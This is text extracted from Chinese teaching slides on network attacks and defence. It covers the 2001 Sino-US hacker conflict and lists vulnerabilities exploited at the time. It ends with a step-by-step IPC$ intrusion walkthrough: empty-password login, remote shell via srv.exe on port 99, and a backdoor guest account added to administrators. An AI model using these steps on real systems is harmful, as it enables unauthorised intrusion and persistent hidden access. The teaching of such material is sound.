攻击与防范实例g精品.pptVIP

计算机网络安全基础 计算机网络安全基础 计算机网络安全基础 常见网络攻击与防范 提纲 常见的网络攻击方法 常用的安全防范措施 常见的网络攻击方法 入侵技术的发展 入侵系统的常用步骤 较高明的入侵步骤 2001年中美黑客大战 事件背景和经过 4.1撞机事件为导火线 4月初，以PoizonB0x、pr0phet为代表的美国黑客组织对国内站点进行攻击，约300个左右的站点页面被修改 4月下旬，国内红（黑）客组织或个人，开始对美国网站进行小规模的攻击行动，4月26日有人发表了 “五一卫国网战”战前声明，宣布将在5月1日至8日，对美国网站进行大规模的攻击行动。 各方都得到第三方支援 各大媒体纷纷报道，评论，中旬结束大战 PoizonB0x、pr0phet更改的网页 国内黑客组织更改的网站页面 这次事件中采用的常用攻击手法 红客联盟负责人在5月9日网上记者新闻发布会上对此次攻击事件的技术背景说明如下： “我们更多的是一种不满情绪的发泄，大家也可以看到被攻破的都是一些小站，大部分都是NT/Win2000系统， 这个行动在技术上是没有任何炫耀和炒作的价值的。” 主要采用当时流行的系统漏洞进行攻击 这次事件中被利用的典型漏洞 用户名泄漏，缺省安装的系统用户名和密码 Unicode 编码可穿越firewall,执行黑客指令 ASP源代码泄露可远程连接的数据库用户名和密码 SQL server缺省安装 微软Windows 2000登录验证机制可被绕过 Bind 远程溢出，Lion蠕虫 SUN rpc.sadmind 远程溢出，sadmin/IIS蠕虫 Wu-Ftpd 格式字符串错误远程安全漏洞 拒绝服务 (syn-flood , ping ) 这次事件中被利用的典型漏洞 用户名泄漏，缺省安装的系统用户名和密码 这次事件中被利用的典型漏洞 Windows 2000登录验证机制可被绕过 常见的安全攻击方法 直接获取口令进入系统：网络监听，暴力破解 利用系统自身安全漏洞 特洛伊木马程序：伪装成工具程序或者游戏等诱使用户打开或下载，然后使用户在无意中激活，导致系统后门被安装 WWW欺骗：诱使用户访问纂改过的网页 电子邮件攻击：邮件炸弹、邮件欺骗 网络监听：获取明文传输的敏感信息 通过一个节点来攻击其他节点：攻击者控制一台主机后，经常通过IP欺骗或者主机信任关系来攻击其他节点以隐蔽其入侵路径和擦除攻击证据 拒绝服务攻击和分布式拒绝服务攻击(D.o.S 和D.D.o.S) 一次利用ipc$的入侵过程 1. C:\net use \\x.x.x.x\IPC$ “” /user:“admintitrators” 用《流光》扫到的用户名是administrators，密码为“空”的IP地址　 2. C:\copy srv.exe \\x.x.x.x\admin$ 先复制srv.exe上去，在流光的Tools目录下　　 3. C:\net time \\x.x.x.x 查查时间，发现x.x.x.x 的当前时间是 2003/3/19 上午 11:00，命令成功完成。　4. C:\at \\x.x.x.x 11:05 srv.exe 用at命令启动srv.exe吧（这里设置的时间要比主机时间推后） 5. C:\net time \\x.x.x.x再查查时间到了没有，如果x.x.x.x 的当前时间是 2003/3/19 上午 11:05，那就准备开始下面的命令。　　6. C:\telnet x.x.x.x 99 这里会用到Telnet命令吧，注意端口是99。Telnet默认的是23端口，但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。虽然我们可以Telnet上去了，但是SRV是一次性的，下次登录还要再激活！所以我们打算建立一个Telnet服务！这就要用到ntlm了 一次利用ipc$的入侵过程 7.C:\copy ntlm.exe \\\admin$ntlm.exe也在《流光》的Tools目录中　　8. C:\WINNT\system32ntlm 输入ntlm启动（这里的C:\WINNT\system32是在对方计算机上运行当出现“DONE”的时候，就说明已经启动正常。然后使用“net start telnet”来开启Telnet服务)9. Telnet x.x.x.x，接着输入用户名与密码就进入对方了为了方便日后登陆,将guest激活并加到管理组????10. C:\net user guest /active:yes 11. C:\net user guest 1234 将Guest的密码改为123412. C:\net localgroup administrators guest /add